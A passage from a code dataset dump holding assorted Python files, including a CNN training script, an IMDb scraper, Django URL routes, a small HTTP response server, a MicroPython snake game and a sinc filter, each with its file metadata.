{}\".format(n_test))\nprint(\"n_subjects: {}\".format(n_subjects))\n\nwith open(\"data/meta.json\", \"w\") as f:\n json.dump({\"n_subjects\": n_subjects}, f)\n\nmc1 = ModelCheckpoint(\n WEIGHTS_DIR + \"weights.best.h5\",\n monitor=\"val_accuracy\",\n verbose=0,\n save_best_only=True,\n mode=\"max\",\n)\n\nmodel = build_cnn(227, n_subjects)\nmodel.summary()\n\nweights_to_load = WEIGHTS_DIR + \"weights.best.h5\"\n\nif os.path.exists(weights_to_load):\n model.load_weights(weights_to_load)\n\ntry:\n if AUGMENTATION:\n data_gen = ImageDataGenerator(\n rotation_range=20,\n width_shift_range=0.2,\n height_shift_range=0.2,\n zoom_range=0.1,\n horizontal_flip=True,\n )\n\n model.fit_generator(\n data_gen.flow(train_x, train_y, batch_size=BATCH_SIZE),\n steps_per_epoch=train_x.shape[0],\n epochs=NB_EPOCH,\n validation_data=(test_x, test_y),\n callbacks=[mc1],\n )\n else:\n model.fit(\n train_x,\n train_y,\n batch_size=BATCH_SIZE,\n epochs=NB_EPOCH,\n validation_data=(test_x, test_y),\n callbacks=[mc1],\n )\nfinally:\n model.save_weights(WEIGHTS_DIR + \"weights.finally.h5\")\n","sub_path":"1_train_cnn.py","file_name":"1_train_cnn.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"169166301","text":"\"\"\"\n Display a tetrahedron with x=3, y=2, z=1\n @st\n\"\"\"\n\nfrom simple3D import DisplayObject, Mesh, Window\nfrom simple3D.components.mouseRotate import MouseRotate\nfrom simple3D.mats.lineMeterial import LineMeterial\n\nvertices = [0.0, 0.0, 0.0,\n 1, 0, 0.0,\n 0, 0, 0,\n 0, 1, 0,\n 0, 0, 0,\n 0, 0, 1]\n\nvertices_color = [1, 0, 0,\n 1, 0, 0,\n 0, 1, 0,\n 0, 1, 0,\n 1, 1, 1,\n 1, 1, 1]\n\nindices = [0, 1, 2, 3, 4, 5]\n\ndef get_axis():\n mesh = Mesh(vertices, indices, vectices_color=vertices_color)\n material = LineMeterial()\n displayObj = DisplayObject(mesh, material)\n return displayObj\n\nif __name__ == \"__main__\":\n displayObj = get_axis()\n window = Window()\n window.add(displayObj)\n mover = MouseRotate(window)\n mover.add(displayObj)\n window.add(mover)\n 
window.render_scene()","sub_path":"examples/draw_line.py","file_name":"draw_line.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"574509076","text":"\"\"\"\nProblem: https://www.acmicpc.net/problem/13565\nSolution: BFS traversal\n\"\"\"\n\nimport collections\n\nm, n = map(int, input().split())\ntextile = [input() for _ in range(m)]\npercolate = [[False for _ in range(n)] for _ in range(m)]\n\nq = collections.deque()\nfor j in range(n):\n if textile[0][j] == '0':\n q.append([0, j])\n\nwhile q:\n i, j = q.popleft()\n if 0 <= i < m and 0 <= j < n and \\\n textile[i][j] == '0' and not percolate[i][j]:\n if i == m - 1:\n print(\"YES\")\n break\n percolate[i][j] = True\n q.append([i - 1, j])\n q.append([i + 1, j])\n q.append([i, j - 1])\n q.append([i, j + 1])\nelse:\n print(\"NO\")\n","sub_path":"13565/13565.py","file_name":"13565.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"21208625","text":"from imdb import IMDb\nimport json\nimport numpy as np\nimport os\nimport pandas as pd\nimport re \nfrom sklearn.preprocessing import MultiLabelBinarizer\n\nia = IMDb() # get the imdb instance\ncwd = os.getcwd() # get the working directory\npath_to_database = (os.path.join(cwd, \"database_new.txt\"))\n#path_to_database = \"/Users/asnafatimaali/Desktop/STEVENS/FE595/Midterm_extra/database.txt\" # PATH TO DATABASE \nwith open(path_to_database, 'r') as file: # load in data\n data_base = json.loads(file.read())\n\n\n# to initialize variables for data storage\nreviews = []\nrating_votes = []\ngenres = []\nfirst_genre = []\nmovie_rating = []\nbudget = []\nruntime = [] #in minutes\nnum_actors = []\n\nactors = []\nroles = []\nmovie_id = []\n\nfor ids in data_base.values(): # for the movie ids in the data base get the following\n if ids not in movie_id: \n moveee = ia.get_movie(ids)\n ia.update(moveee, info=['vote details', 'reviews'])\n\n # to get reviews \n try:\n movie_review = \"\"\n for x in range(0, len(moveee['reviews'])): # imdbpy api only gives you 25 reviews \n one_review = moveee['reviews'][x]['content']\n movie_review = movie_review + \" \" + one_review\n reviews.append(movie_review)\n except IndexError:\n reviews.append(\" \")\n except KeyError:\n reviews.append(\" \")\n\n # to get votes by users. 
The votes are used by imdb to come up with their score\n try:\n rating_votes.append(moveee['votes'])\n except ValueError:\n rating_votes.append(np.NAN)\n except KeyError:\n rating_votes.append(np.NAN)\n\n # to get genres, we collected all genres and the first one in the list\n\n genres.append(moveee['genres'])\n first_genre.append(moveee['genres'][0])\n\n # Imdb's ratings \n try:\n movie_rating.append(moveee['rating'])\n except ValueError:\n movie_rating.append(np.NAN)\n except KeyError:\n movie_rating.append(np.NAN)\n\n # the budget of the film \n try:\n something = moveee['box office']\n numba = re.split(\" \", something['Budget'])[0]\n numba = re.sub(\"\\$\",\"\", numba)\n numba = re.sub(\",\", \"\", numba)\n numba = re.sub(r\"\\D\",\"\", numba)\n try:\n numba = int(numba)\n except ValueError:\n numba = float(numba)\n except KeyError:\n numba = np.NAN\n budget.append(numba)\n\n\n # the Runtime in minutes\n try:\n runtime = runtime + moveee['runtimes']\n except ValueError:\n runtime.append(np.NAN)\n except KeyError:\n runtime.append(np.NAN)\n\n\n # The number of actor Actors\n try: \n num_actors.append(len(moveee['cast']))\n except KeyError:\n num_actors.append(np.NAN)\n movie_id.append(ids)\n\n# to create a data frame and store the information\nmovie_data = pd.DataFrame()\n\nmovie_data['movie_id'] = movie_id\nmovie_data['reviews'] = reviews\nmovie_data['rating_votes'] = rating_votes\nmovie_data[\"genres\"] = genres\nmovie_data['first_genre'] = first_genre\nmovie_data[\"movie_rating\"] = movie_rating\nmovie_data['budget'] = budget\nmovie_data['runtime'] = runtime\nmovie_data[\"num_actors\"] = num_actors\n \nmovie_data.to_csv('/Users/asnafatimaali/Desktop/STEVENS/FE595/Final/movie_data.csv')\n\n# created a separate loop later to get information on the actors \n#initializing variables \nactor_ids = {}\nmovie_cast = []\nmovie_id = []\n\n# for the actor searched, store the movie id, since order is not perserved in the dictionary, \n# the actors name and their id, from which a dictionary database is being created \n# and the list of actors in the movie \nfor ids in data_base.values():\n movie_id.append(ids)\n moveee = ia.get_movie(ids)\n try:\n cast = moveee['cast']\n cast_string = str(moveee['cast'])\n cast_id = re.findall(r'\\d{7}', cast_string)\n movie_cast.append(cast_id)\n for x in range(0,len(cast_id)-1):\n if cast_id[x] not in actor_ids.values():\n temp = dict({str(cast[x]): cast_id[x]})\n actor_ids.update(temp)\n except KeyError:\n movie_cast.append(\"N/A\")\n except ValueError:\n movie_cast.append(\"N/A\")\n\n# To store actor and their ids\npath_to_store = \"/Users/asnafatimaali/Desktop/STEVENS/FE595/Final/actor_ids.txt\" \nfile = open(path_to_store, 'w+')\nfile.write(json.dumps(actor_ids))\nfile.close()\n\n\nactors_data = pd.DataFrame()\n\nactors_data['cast_ids'] = movie_cast\nactors_data['movie_id'] = movie_id\n\nactors_data.to_csv('/Users/asnafatimaali/Desktop/STEVENS/FE595/Final/actors_data.csv')\n\n# we will be hot encoding the data frame actors_data in which we can get a breakdown of actors by movies \nmovie_cast1 = pd.Series(movie_cast)\n\nmlb = MultiLabelBinarizer()\n\ncast_encoded = pd.DataFrame(mlb.fit_transform(movie_cast1), columns=mlb.classes_, index=movie_cast1.index)\n\n#hot encoding created extra columns which we are removing\nextra_cols = []\nfor x in cast_encoded.columns:\n if x not in actor_ids.values():\n extra_cols.append(x)\n\ndata = cast_encoded\ndata = data.drop(extra_cols, axis=1)\n\ncast_encoded.index = movie_id\n\n# from the hot encoded database we will 
create a dictionary by actor id key and list of movies values\nactors_in_movies = {}\nfor x in data.columns:\n num_match = data.loc[data[x] == 1]\n index_match = list(num_match.index)\n temp = dict({str(x): index_match}) # dictionary where actor ids are key and movie ids are values\n actors_in_movies.update(temp)\n\n\n# To store actor ids and the movies they appear in\npath_to_store = \"/Users/asnafatimaali/Desktop/STEVENS/FE595/Final/actor_in_movies.txt\" \nfile = open(path_to_store, 'w+')\nfile.write(json.dumps(actors_in_movies))\nfile.close()\n\n","sub_path":"data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"244943128","text":"import os\nimport time\n\npoolsb = [\"ltmPoolStatusAvailState\", \"ltmPoolStatusEnabledState\", \"ltmPoolMemberCnt\", \"ltmPoolMinActiveMembers\",\\\n \"ltmPoolActiveMemberCnt\", \"ltmPoolStatServerCurConns\", \"ltmPoolStatServerMaxConns\"] \n\nos.chdir (\"/Users/rafael/Documents/all_python/git/aloha/data\")\n\ndef processa_reals():\n vet = []\n indice = 0\n tamanho = len(poolsb)\n\n try:\n with open(\"targets_pool\") as b15_pool:\n for each in b15_pool.readlines():\n if \"id_pool\" in each:\n (mull, idpool) = each.strip().split(\"=\")\n idpool = idpool.replace(\"\\\"\", \"\")\n\n if \"display-name\" in each:\n (mull, displayname) = each.strip().split(\"=\")\n displayname = displayname.replace(\"\\\"\", \"\").lower()\n print (displayname)\n\n displayname_idpool = \"[\" + displayname.strip() + \",\" + idpool.strip() + \"]\"\n print (displayname_idpool)\n \n for indice in poolsb:\n saida = indice + displayname_idpool\n print (\"Saida: \", saida + \" \" + str(poolsb.index(indice)))\n \n vet.append(displayname_idpool)\n \n return vet\n \n except FileNotFoundError as fnfe:\n print (\"File Not Found Error\" + str(fnfe))\n \n \n\"\"\" \ndef item_keys():\n saida = processa_reals()\n num = 0\n for dados in poolsb:\n for itens in saida:\n result0 = dados + '[' + itens + ']'\n result1 = result0 + ' ' + str(num) + ' '\n result_txt = result0 + '.txt'\n print (result1 + result_txt + ' > ' + result_txt + \".out\")\n \n num += 1\n\"\"\"\n\nprocessa_reals()\n","sub_path":"bin/poolsb.py","file_name":"poolsb.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"402824257","text":"from configparser import ConfigParser\n\ndef config(filename='data.ini',section='psql'):\n #create a parser\n parser=ConfigParser()\n\n #read config file\n parser.read(filename)\n\n #read or get section\n db = {}\n if parser.has_section(section):\n params=parser.items(section)\n for param in params:\n db[param[0]]=param[1]\n else:\n raise Exception('Section {0} not found in the {1} file'.format(section, filename))\n\n return db\n\n\n\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"576302592","text":"from django.urls import path, include\nfrom django.conf.urls import url\nfrom matricula import views\n# from django.contrib.auth import logout\n\n\n\nurlpatterns = [\n # Student enrollment\n path(r'matricula_create', views.matricula_create, name='matricula_create'),\n path(r'matricula_edit/<int:pk>/', views.matricula_edit, name='matricula_edit'),\n path(r'matricula_detail/<int:pk>/', views.MatriculaDetail.as_view(), name = 'matricula_detail'),\n 
path(r'matricula_list/', views.MatriculaList.as_view(), name = 'matricula_list'),\n\n # Enrollment (secretary views)\n path(r'matriculas_pendientes_list/', views.matriculas_pendientes_list, name = 'matriculas_pendientes_list'),\n path(r'matriculados_list/', views.matriculados_list, name = 'matriculados_list'),\n path(r'matricula_aprobacion/<int:pk>/', views.matricula_aprobacion, name = 'matricula_aprobacion'),\n path(r'desaprobar_matricula/<int:pk>/', views.desaprobar_matricula, name = 'desaprobar_matricula'),\n path(r'certificado_matricula/<int:pk>/', views.certificado_matricula, name = 'certificado_matricula'),\n path(r'matricula_delete/<int:pk>/', views.MatriculaDelete.as_view(), name = 'matricula_delete'),\n\n # Student list\n path(r'form_estudiantes_filter/', views.form_estudiantes_filter, name = 'form_estudiantes_filter'),\n # Admission requests\n path(r'solicitud_ingreso_create/', views.solicitud_ingreso_create, name = 'solicitud_ingreso_create'),\n path(r'solicitud_ingreso/', views.solicitud_ingreso, name = 'solicitud_ingreso'),\n path(r'solicitud_ingreso_list/', views.solicitud_ingreso_list, name = 'solicitud_ingreso_list'),\n path(r'solicitudes_pendientes_list/', views.solicitudes_pendientes_list, name = 'solicitudes_pendientes_list'),\n path(r'solicitudes_aprobadas_list/', views.solicitudes_aprobadas_list, name = 'solicitudes_aprobadas_list'),\n path(r'aprobar_solicitud/<int:pk>/', views.aprobar_solicitud, name = 'aprobar_solicitud'),\n path(r'ver_solicitud/<int:pk>/', views.ver_solicitud, name = 'ver_solicitud'),\n path(r'solicitud_delete/<int:pk>/', views.SolicitudIngresoDelete.as_view(), name = 'solicitud_delete'),\n]\n","sub_path":"matricula/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"652213018","text":"\"\"\"classroomsonline URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom classrooms import views\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n # Classroom content\n path('', views.home, name='home'), # The home page.\n path('classroom/',\n views.StudentClassroom.as_view(), name='classroom'), # Path to the classroom.\n path('classroom-signup/',\n views.sign_up, name='classroom-signup'), #sign up for classroom\n path('teacher-classroom/',\n views.TeacherClassroom.as_view(), name='teacher-classroom'), #teacher view\n\n # Registration and user auth\n path('register/', views.register_page, name='register'),\n path('login/', views.login_form, name='login'),\n path('logout/', views.logout_view, name='logout'),\n\n #administrative\n #classrooms\n path('administration/', views.administration, name='administration'),\n path('administration/create-new-class/',\n views.create_new_classroom, name='create-new-class'),\n path('administration/edit-classroom/<int:pk>/',\n views.edit_classroom, name='edit-classroom'),\n #companies\n path('administration/manage-companies/', views.manage_companies, name='manage-companies'),\n path('administration/manage-companies/add-new-company/',\n views.add_new_company, name='add-new-company'),\n\n path('administration/manage-companies/edit-company/<int:pk>/',\n views.edit_company, name='edit-company'),\n #teachers\n path('administration/manage-teachers/', views.manage_teachers, name='manage-teachers'),\n path('administration/manage-teachers/create-new-teacher',\n views.add_new_teacher, name='create-new-teacher'),\n\n]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","sub_path":"classroomsonline/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"60826520","text":"import datetime, directory\nfrom mimetypes import MimeTypes\n\nclass Cache:\n\n items = {}\n\n @staticmethod\n def add(response):\n Cache.items[response.resource.as_posix()] = response\n\n @staticmethod\n def get(response):\n try:\n return Cache.items[response.resource.as_posix()]\n except:\n return None\n\nclass Response:\n\n codes = {\"200\":\"OK\",\n \"404\":\"NOT FOUND\"}\n\n def __init__(self, status, resource=None, version=1.1):\n self.version = version\n self.status = f\"HTTP/{self.version} {status} {Response.codes[status]}\\r\\n\"\n self.resource = resource\n \n @property\n def headers(self):\n if self.resource.is_file():\n header = {\"Date\":str(datetime.datetime.now().strftime('%a %d %b %Y %H:%M:%S %Z')),\n \"Server\":\"http.py\",\n \"Last-Modified\":str(datetime.datetime.fromtimestamp(float(self.resource.stat().st_mtime)).strftime('%a %d %b %Y %H:%M:%S %Z')),\n \"Connection\":\"Closed\",\n \"Content-Length\":str(self.resource.stat().st_size),\n \"Content-Type\":str(MimeTypes().guess_type(self.resource.as_posix()))}\n if self.resource.is_dir():\n header = {\"Date\":str(datetime.datetime.now().strftime('%a %d %b %Y %H:%M:%S %Z')),\n \"Server\":\"http.py\",\n \"Last-Modified\":str(datetime.datetime.fromtimestamp(float(self.resource.stat().st_mtime)).strftime('%a %d %b %Y %H:%M:%S %Z')),\n \"Content-Length\":str(len(bytes(directory.listing(self.resource), \"UTF-8\"))),\n \"Content-Type\":\"None, None\",\n \"Connection\":\"Closed\"}\n 
return header\n\n @property\n def content(self):\n if self.resource.is_dir():\n yield directory.listing(self.resource.as_posix())\n if self.resource.is_file():\n yield self.resource.read_text()\n return \"\\r\\n\"\n\n def __iter__(self):\n yield self.status\n if self.resource:\n if self.headers:\n for key, value in self.headers.items():\n print(f\"{key}: {value}\")\n yield f\"{key}: {value}\\r\\n\"\n yield \"\\r\\n\"\n for chunk in self.content:\n yield chunk\n yield \"\\r\\n\"\n \ndef reply(request):\n cached_response = Cache.get(request)\n if cached_response is not None:\n return cached_response\n response = None\n if request.resource.exists() is True:\n if request.resource.is_file():\n if request.method == \"GET\":\n response = Response(\"200\", request.resource)\n if request.method == \"HEAD\":\n resource = directory.listing(request.resource)\n response = Response(\"200\", request.resource)\n if request.resource.is_dir():\n if request.method == \"GET\":\n response = Response(\"200\", request.resource)\n if request.method == \"HEAD\":\n resource = directory.listing(request.resource)\n response = Response(\"200\", resource)\n elif request.resource.exists() is False:\n response = Response(\"404\")\n if response is not None:\n Cache.add(response)\n return response\n\n\ndef main():\n from pathlib import Path\n p = Path(\"./accerciser-3.32.1-1-any.pkg.tar.xz\")\n response = Response(\"200\", p)\n assert response.status == \"HTTP/1.1 200 OK\\r\\n\"\n assert response.version == 1.1\n assert response.headers[\"Date\"] == str(datetime.datetime.now().strftime('%a %d %b %Y %H:%M:%S %Z'))\n assert response.headers[\"Server\"] == \"http.py\"\n assert response.headers[\"Last-Modified\"] == str(datetime.datetime.fromtimestamp(float(p.stat().st_mtime)).strftime('%a %d %b %Y %H:%M:%S %Z'))\n assert response.headers[\"Connection\"] == \"Closed\"\n assert response.headers[\"Content-Length\"] == str(p.stat().st_size)\n assert response.headers[\"Content-Type\"] == str(MimeTypes().guess_type(p.as_posix()))\n\nif __name__ == \"__main__\":\n main()","sub_path":"response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"308000114","text":"import pandas as pd\nimport numpy as np\nimport os\nimport json\n\nwith open(\"./user_types.json\") as json_file:\n user_types = json.load(json_file)\n\nroot_dir = './data/cresci-2015.csv/'\ndirs = sorted(os.listdir(root_dir))\n\ndf_users = pd.DataFrame()\ndf_tweets = pd.DataFrame()\ndf_friends = pd.DataFrame()\ndf_followers = pd.DataFrame()\n\nfor item in dirs:\n if os.path.isdir(root_dir + item):\n with open(root_dir + item + '/users.csv', 'rb') as users_file:\n is_bot = 1 if item in ['INT.csv', 'FSF.csv', 'TWT.csv'] else 0\n print(item + ': ' + str(is_bot))\n new_data = pd.read_csv(users_file)\n new_data['bot'] = is_bot\n df_users = pd.concat([df_users, new_data])\n \n# with open(root_dir + item + '/tweets.csv', 'rb') as tweets_file:\n# df_tweets = pd.concat([df_tweets, pd.read_csv(tweets_file)])\n# \n# with open(root_dir + item + '/friends.csv', 'rb') as friends_file:\n# df_friends = pd.concat([df_friends, pd.read_csv(friends_file)])\n# \n# with open(root_dir + item + '/followers.csv', 'rb') as followers_file:\n# df_followers = pd.concat([df_followers, pd.read_csv(followers_file)])\n\ndef to_bool(df, var):\n df[var] = pd.to_numeric(df[var]).fillna(0)\n df[var] = df[var].astype('bool')\n return df\nbool_vars = ['geo_enabled', 
'profile_use_background_image']\nfor var in bool_vars:\n df_users = to_bool(df_users, var)\n\nprint(df_users.dtypes)","sub_path":"eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"106026872","text":"#regex\nimport os\nimport re\n\ncaps = \"([A-Z])\"\nchars = \"([A-Z]|[a-z]|\" \")\"\nmarks = \"([?]|[.]|[!]|[/])\"\nprefixes = \"(Mr|St|Mrs|Ms|Dr)[.]\"\nsuffixes = \"(Inc|Ltd|Jr|Sr|Co)\"\nstarters = \"(Mr|Mrs|Ms|Dr|He\\s|She\\s|It\\s|They\\s|Their\\s|Our\\s|We\\s|But\\s|However\\s|That\\s|This\\s|Wherever)\"\nacronyms = \"([A-Z][.][A-Z][.](?:[A-Z][.])?)\"\nwebsites = \"[.](com|net|org|io|gov)\"\n\ndef split_into_sentences(text):\n text = \" \" + text + \" \"\n text = text.replace(\"\\n\",\" \")\n text = re.sub(prefixes,\"\\\\1<prd>\",text)\n text = re.sub(websites,\"<prd>\\\\1\",text)\n if \"Ph.D\" in text: text = text.replace(\"Ph.D.\",\"Ph<prd>D<prd>\")\n text = re.sub(\"\s\" + caps + \"[.] \",\" \\\\1<prd> \",text)\n text = re.sub(acronyms+\" \"+starters,\"\\\\1<stop> \\\\2\",text)\n text = re.sub(caps + \"[.]\" + caps + \"[.]\" + caps + \"[.]\",\"\\\\1<prd>\\\\2<prd>\\\\3<prd>\",text)\n text = re.sub(caps + \"[.]\" + caps + \"[.]\",\"\\\\1<prd>\\\\2<prd>\",text)\n text = re.sub(\" \"+suffixes+\"[.] \"+starters,\" \\\\1<stop> \\\\2\",text)\n text = re.sub(\" \"+suffixes+\"[.]\",\" \\\\1<prd>\",text)\n text = re.sub(\" \" + caps + \"[.]\",\" \\\\1<prd>\",text)\n if '?\"' in text: text = text.replace('?\"','\"<qst>')\n if '/\"' in text: text = text.replace('/\"','\"<sls>')\n if '!\"' in text: text = text.replace('!\"','\"<exc>')\n text = text.replace(\".\",\".<stop>\")\n text = text.replace(\"?\",\"?<stop>\")\n text = text.replace(\"!\",\"!<stop>\")\n text = text.replace(\"/\",\"/<stop>\")\n text = text.replace(\"<prd>\",\".\")\n text = text.replace(\"<qst>\",\"?\")\n text = text.replace(\"<sls>\",\"/\")\n text = text.replace(\"<exc>\",\"!\")\n sentences = text.split(\"<stop>\")\n sentences = sentences[:-1]\n sentences = [s.strip() for s in sentences]\n return sentences\n\ndef read_files_and_save():\n path = \"ml_data/aclImdb/test/neg/\"\n saved_path = \"ml_data/aclImdb_converted/test-neg-origin.txt\"\n\n filenames = next(os.walk(path))[2]\n texts = []\n\n for name in filenames:\n with open(path + name, \"r\") as f:\n texts.append(f.read())\n\n with open(saved_path, \"w\") as f:\n for text in texts:\n f.write(text + \"\\n\")\n f.close()\n\ndef trim_sentence():\n path = \"ml_data/aclImdb_converted/test-pos-origin.txt\"\n saved_path = \"ml_data/aclImdb_converted/test-pos.txt\"\n text = \"\"\n with open(path, \"r\") as f:\n text = f.read()\n # replace by the following order\n text = re.sub(\"<br />\", \" \", text)
\n punctuation = '([?]|[.]|[!]|[/]|[(]|[)]|[;]|[,]|[\"]|[{]|[}]|[*]|[+]|[>]|[<])'\n text = re.sub(punctuation, \" \", text)\n text = re.sub(\" '|' \", \" \", text)\n text = re.sub(\" +\", \" \", text)\n text = text.lower()\n\n with open(saved_path, \"w\") as f:\n f.write(text)\n f.close()\n\ndef test_input():\n saved_path = \"ml_data/aclImdb_converted/train-unsup.txt\"\n text = \"\"\n with open(saved_path, \"r\") as f:\n text = f.read()\n print(text.count(\"\\n\"))\n if \"\\n\" in text: \n print(\"YES\")\n else: \n print(\"NO\")","sub_path":"library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"149883231","text":"import utime\r\nfrom urandom import randint\r\nimport screen\r\nimport machine\r\n\r\ndef color565(r,g,b):\r\n return r << 16 | g << 8 | b\r\n\r\nclass Display:\r\n def fill(self, background_color):\r\n screen.set_background_color(background_color)\r\n screen.clear()\r\n\r\n def fill_cell(self, x,y,w,h,color):\r\n print(\"cell not support\")\r\n\r\n def fill_rectangle(self, x,y, width, height, color):\r\n path = []\r\n path = path + [x,y] + [x+width,y] + [x+width,y+height] + [x,y+height]\r\n screen.drawpoly(path, color)\r\n\r\ndisplay = Display()\r\n\r\nkeys = [machine.Switch(i) for i in range(4)]\r\n\r\nclass Grid(object):\r\n def __init__(self, master=None,x=10, y=10, w=222, h=303):\r\n self.x = x\r\n self.y = y\r\n self.w = w\r\n self.h = h\r\n self.width=w//10-1\r\n self.height=h//10-1\r\n self.bg=color565(0x00, 0x00, 0x00)\r\n print(self.width,self.height)\r\n display.fill(self.bg)\r\n\r\n def draw(self, pos, color):\r\n x = pos[0] * 10 + self.x+1\r\n y = pos[1] * 10 + self.y+1\r\n display.fill_rectangle(x,y,10,10,color)\r\n \r\nclass Food(object):\r\n def __init__(self, grid, color = color565(0xff, 0x00, 0x00)):\r\n self.grid = grid\r\n self.color = color\r\n self.set_pos()\r\n self.type = 1\r\n\r\n def set_pos(self):\r\n x = randint(0, self.grid.width - 1)\r\n y = randint(0, self.grid.height - 1)\r\n self.pos = (x, y)\r\n\r\n def display(self):\r\n self.grid.draw(self.pos, self.color)\r\n\r\nclass Snake(object):\r\n def __init__(self, grid, color = color565(0xff, 0xff, 0xff)):\r\n self.grid = grid\r\n self.color = color\r\n self.body = [(5, 5), (5, 6), (5, 7)]\r\n self.direction = \"Up\"\r\n for i in self.body:\r\n self.grid.draw(i, self.color)\r\n\r\n #this method re-initializes the snake's position when the game restarts\r\n def initial(self):\r\n while not len(self.body) == 0:\r\n pop = self.body.pop()\r\n self.grid.draw(pop, self.grid.bg)\r\n self.body = [(8, 11), (8, 12), (8, 13)]\r\n self.direction = \"Up\"\r\n self.color = color565(0xff, 0xff, 0xff)\r\n for i in self.body:\r\n self.grid.draw(i, self.color)\r\n\r\n #move the snake to a given point\r\n def move(self, new):\r\n self.body.insert(0, new)\r\n pop = self.body.pop()\r\n self.grid.draw(pop, self.grid.bg)\r\n self.grid.draw(new, self.color)\r\n\r\n #move the snake to a given point and grow in length\r\n def add(self ,new):\r\n self.body.insert(0, new)\r\n self.grid.draw(new, self.color)\r\n\r\n #the snake ate special food 1: shorten its body\r\n def cut_down(self,new):\r\n self.body.insert(0, new)\r\n self.grid.draw(new, self.color)\r\n for i in range(0,3):\r\n pop = self.body.pop()\r\n self.grid.draw(pop, self.grid.bg)\r\n\r\n #the snake ate special food 2: back to the initial length\r\n def init(self, new):\r\n self.body.insert(0, new)\r\n self.grid.draw(new, self.color)\r\n while len(self.body) > 3:\r\n pop = self.body.pop()\r\n self.grid.draw(pop, self.grid.bg)\r\n\r\n #the snake ate special food 3: change its color, just for fun\r\n def change(self, new, color):\r\n 
+{"seq_id":"37919600","text":"import numpy as np\nimport pandas as pd\nfrom quickplot import qp\nimport warnings\n\ndef filterSinc(signal,f,type='gauss',d=False,p=False):\n ''' filter Types : no, gauss, first\n - no : Border effects are to be expected, nothing is done to correct the signal\n - gauss : a gaussian falloff is added to each side of the signal\n - first : repeat the first and last value of the signal\n '''\n l = len(signal)\n #print('length : '+str(l))\n x = np.linspace(-l/2,l/2,len(signal)*10)\n s = np.sinc(2*f*x)\n \n #compute Blackman Window\n w=0.42-0.5*np.cos( 2*np.pi*np.linspace(0,l*10-1,l*10)/(l*10-1) ) +\\\n 0.08*np.cos( 4*np.pi*np.linspace(0,l*10-1,l*10)/(l*10-1) )\n \n #plot raw sinc\n if p:\n df = pd.DataFrame(s,columns=[\"s\"])\n df['x']=x\n df.plot(x='x',figsize=(20,8))\n \n #plot Blackman window\n if p:\n qp(w,np.linspace(0,l*10-1,l*10)).set(title='blackman window')\n #df = pd.DataFrame(w,columns=[\"s\"])\n #df['x']=np.linspace(0,l*10-1,l*10)\n #df.plot(x='x',figsize=(20,8))\n s=w*s\n s=s/sum(s)\n \n #plot sinc with blackman\n if p:\n df = pd.DataFrame(s,columns=[\"s\"])\n df['x']=x\n df.plot(x='x',figsize=(20,8))\n \n lin = np.linspace(0,l-1,l*10)\n interp = np.interp(lin, np.linspace(0,l-1,l),signal)\n ls = int(np.ceil(len(s)/2))\n \n if type == 'first':\n interp = np.concatenate(([interp[0]] *ls, interp, [interp[-1]] *ls))\n uninterp = np.linspace(ls,ls+l*10-1,l).astype(int)\n elif type == 'gauss':\n interp = np.concatenate(( [interp[0]*np.exp(-(x-0)**2/(3*len(interp))) for x in np.linspace(-ls,0,ls) ], interp, [interp[-1]*np.exp(-(x-len(interp))**2/(3*len(interp))) for x in np.linspace(len(interp),len(interp)+ls,ls) ] ))\n uninterp = np.linspace(ls,ls+l*10-1,l).astype(int)\n elif type == 'no':\n uninterp = np.linspace(0,l*10-1,l).astype(int) \n else:\n warnings.warn(\"The type of filtering : \"+ str(type) +\" is not handled. Reverting to 'no'.\")\n uninterp = np.linspace(0,l*10-1,l).astype(int) \n #qp(signal2).set(title='Signal[0]--,signal,--signal[-1]')\n #qp(signal3).set(title='Signal[0]--,signal,--signal[-1]')\n #qp(signal).set(title='signal')\n \n #df2 = pd.DataFrame(interp,columns=['interped'])\n #df2['x1']=lin\n \n #axes = df2.plot(x='x1',figsize=(20,8))\n \n #df3 = pd.DataFrame(signal,columns=['notInterped'])\n #df3['x']=np.linspace(0,l-1,l)\n #df3.plot(ax=axes,x='x')\n if d:\n qp(interp).set(title='interpolation ' + str(type))\n convo = np.convolve(interp,s,'same')\n \n \n #print('len sinc : 